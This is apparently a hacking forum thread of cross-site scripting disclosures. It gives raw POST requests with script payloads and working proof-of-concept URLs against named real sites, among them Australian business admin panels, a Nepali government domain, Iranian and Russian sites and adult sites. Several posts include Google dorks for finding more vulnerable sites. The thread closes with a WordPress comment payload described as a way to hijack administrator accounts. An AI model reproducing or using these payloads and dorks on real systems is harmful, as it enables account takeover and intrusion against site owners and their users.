    XSS Proof Image: http://i.imgur.com/PDcO50Y.png
    ============================================================================

    ========================== HTTP REQUEST XSS 3 ==============================
    Host: site.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Referer: http://site.com/login.php?operation=get_email
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 91
    POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0
    XSS Proof Image: http://i.imgur.com/MFc5unu.png
    ============================================================================

    ========================== HTTP REQUEST XSS 4 ==============================
    Host: site.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Referer: http://site.com/register.php
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 207
    POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0
    XSS Proof Image: http://i.imgur.com/7T4WZMW.png
    ============================================================================

    1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    0 [+] Persistent XSS Cross Site Scripting [+] 0
    1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    Affected path(s):
    album.add.php?parent=

    ========================== HTTP REQUEST XSS 5 ==============================
    Host: site.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Referer: http://site.com/album.add.php?parent=
    Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 132
    POST: album_caption='"><script>alert('1337')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0
    XSS Proof Image: http://i.imgur.com/TrzBqXJ.png
    ============================================================================
    --------------------------------------------------------------------------------------------
    ####################################################### Anonysec hacker iranin ########################################################
    =======================================================
    # Discovered by : Rednofozi
    #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/2026
  16. Rednofozi

    Pro-Exploit

    [+] Title :- AKP Meda Design Admin Panel XSS
    [+] Date :- 2018-09-10
    [+] Exploit Author :- Rednofozi
    [+] Vendor Homepage :-N/A
    [+] Version :- All Versions
    [+] Tested on :- Linux - Windows
    [+] Category :- webapps
    [+] Google Dorks :- N/A
    [+] Team name :- Anonysec.org
    [+] Official Website :- nadaram :d
    [+] Contact :- Rednofozi@yahoo.com
    =========================================================
    ########################################################
    Developers: VNSinfo/akpwork
    App Version: All
    Vuln: /admin/index.php?msg=<HERE>
    Example List \/
    Example 1: http://www.insightradiology.com.au/admin/index.php?msg=<svg/onload=alert(document.domain)>
    Example 2: http://thedukehotel.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E
    Example 3: http://gremarine.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E
    Example 4: http://worklocker.com.au/admin/index.php?msg=%3Csvg/onload=alert(document.domain)%3E
    Example 5: http://www.fxma.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E
    Examples End /\
    ####################################################### Anonysec hacker iranin ########################################################
    =======================================================
    # Discovered by : Rednofozi
    #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/2024
  17. Moeein Seven

    Hacking-Penetration testing to the site

    // Reflected XSS in AdultJoy (Adult website) //
    Site URL: http://adultjoy.net/
    Vulnerable PHP: search.php
    Vulnerable URL: http://adultjoy.net/search.php?search=
    Payload Used: %3Csvg/onload=(confirm)()%3E
    PoC Url: http://adultjoy.net/search.php?search=%3Csvg/onload=(confirm)()%3E
    Found by: da74
  18. // Reflected XSS in PornZebra Search Engine //
    Site URL: http://pornzebra.com/
    Vulnerable PHP: search.php
    Vulnerable URL: http://pornzebra.com/search.php?q=
    Payload Used: %3Csvg/onload=(confirm)()%3E
    PoC Url: http://pornzebra.com/search.php?q=%3Csvg/onload=(confirm)()%3E
    Found by: da74
  19. Rednofozi

    Pro-Exploit

    ############################################
    # Title :Russia site view.php XSS Vulnerability
    # Author :Rednofozi
    # category : webapps
    # Tested On : Win 8 , Kali Linux
    # team:https://anonysec.org
    # me : Rednofozi@yahoo.com
    # Vendor HomePage :photolipetsk.ru
    # Google Dork: inurl:''/.view.php?PID= /view.php?PID=' site:ru
    ############################################
    # search google Dork : inurl:''/.view.php?PID= /view.php?PID=' site:ru
    ####################Proof of Concept #############
    #Demo : https://photolipetsk.ru/view.php?pid=57472&cat=12' (XSS Vulnerability)
    <script>alert("rednofozi")</script>
    # Discovered by : Rednofozi
    #tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/1984
  20. ############################################
    # Title : user and password of the American Recovery site XSS Vulnerability
    # Author :Rednofozi
    # category : webapps
    # Tested On : Win 8 , Kali Linux
    # my team:https://anonysec.org
    # me : Rednofozi@yahoo.com
    # Vendor HomePage :https://www.diamondcard.us
    # Google Dork: inurl:''/.php?pass=' site:us
    ############################################
    # search google Dork :inurl:''/.php?pass=' site:us
    ####################Proof of Concept #############
    #Demo and test : https://www.diamondcard.us/download/api/example.php' (XSS Vulnerability)
    <script>alert("rednofozi")</script>
    # Discovered by : Rednofozi
    #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/1982
  21. Rednofozi

    Pro-Exploit

    ############################################
    # Title :CMd npal XSS Vulnerability
    # Author :anonysec
    # category : webapps
    # Tested On : Win 8 , Kali Linux
    # team:https://anonysec.org
    # me : Rednofozi@yahoo.com
    # Vendor HomePage :http://ag.gov.np
    # Google Dork: inurl:''/.php?cmd=' site:np
    ############################################
    # search google Dork : inurl:''/.php?cmd=' site:np
    ####################Proof of Concept #############
    #Demo : http://ag.gov.np/cgialfa/alfasymlink/alfaperl.txt/home/pahsgov11/public_html/noscript.php' (XSS Vulnerability)
    <script>alert("rednofozi")</script>
    # Discovered by : Rednofozi
    #tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/1981
  22. Rednofozi

    Pro-Exploit

    http://www.exploit4arab.org/exploits/1979
    ############################################
    # Title : Designed by YouBon XSS Vulnerability
    # Author :Rednofozi
    # category : webapps
    # Tested On : Win 8 , Kali Linux
    # my team:https://anonysec.org
    # me : Rednofozi@yahoo.com
    # Vendor HomePage :https://www.youbon.ir
    # Google Dork: 'inurl:''/details.php?id='' site:ir'
    ############################################
    # search google Dork :'inurl:''/details.php?id='' site:ir'
    ####################Proof of Concept #############
    #Demo : https://www.youbon.ir/product-details.php?id=2037' (XSS Vulnerability)
    <script>alert("rednofozi")</script>
    # Discovered by : Rednofozi
    #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  23. ############################################
    # Title : Designed by iran sites XSS Vulnerability
    # Author :Rednofozi
    # category : webapps
    # Tested On : Win 8 , Kali Linux
    # my team:https://anonysec.org
    # me : Rednofozi@yahoo.com
    # Vendor HomePage :http://www.belkad.ir
    # Google Dork: inurl:''/details.php?id='' site:ir
    ############################################
    # search google Dork :inurl:''/details.php?id='' site:ir
    ####################Proof of Concept #############
    #Demo : http://www.belkad.ir/article-details.php?id=139' (XSS Vulnerability)
    <script>("rednofozi")</script>
    # Discovered by : Rednofozi
    #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/1977
  24. Rednofozi

    Pro-Exploit

    ############################################
    # Title : resaneh-fc.ir XSS Vulnerability
    # Author :Rednofozi
    # category : webapps
    # Tested On : Win 8 , Kali Linux
    # my team:https://anonysec.org
    # me : Rednofozi@yahoo.com
    # Vendor HomePage :resaneh-fc.ir
    # Google Dork: N/A
    ############################################
    # search google Dork : N/A
    ####################Proof of Concept #############
    #Demo : http://resaneh-fc.ir/details.php?id=67_0_3_0_C' (XSS Vulnerability)
    Search the web for the XSS bug script.
    # Discovered by : Rednofozi
    #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  25. Rednofozi

    Hacking-Bugs

    By submitting JavaScript code in the comments section, an attacker can take control of a WordPress website. With the Cross Site Script hole, the attacker can change the administrator's password, create a new user account on the site, or do anything else that the currently logged-in administrator can do on the target system. At present WordPress versions 4.2, 4.1.2, 4.1.1 and 3.9.3 are all vulnerable.

    <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>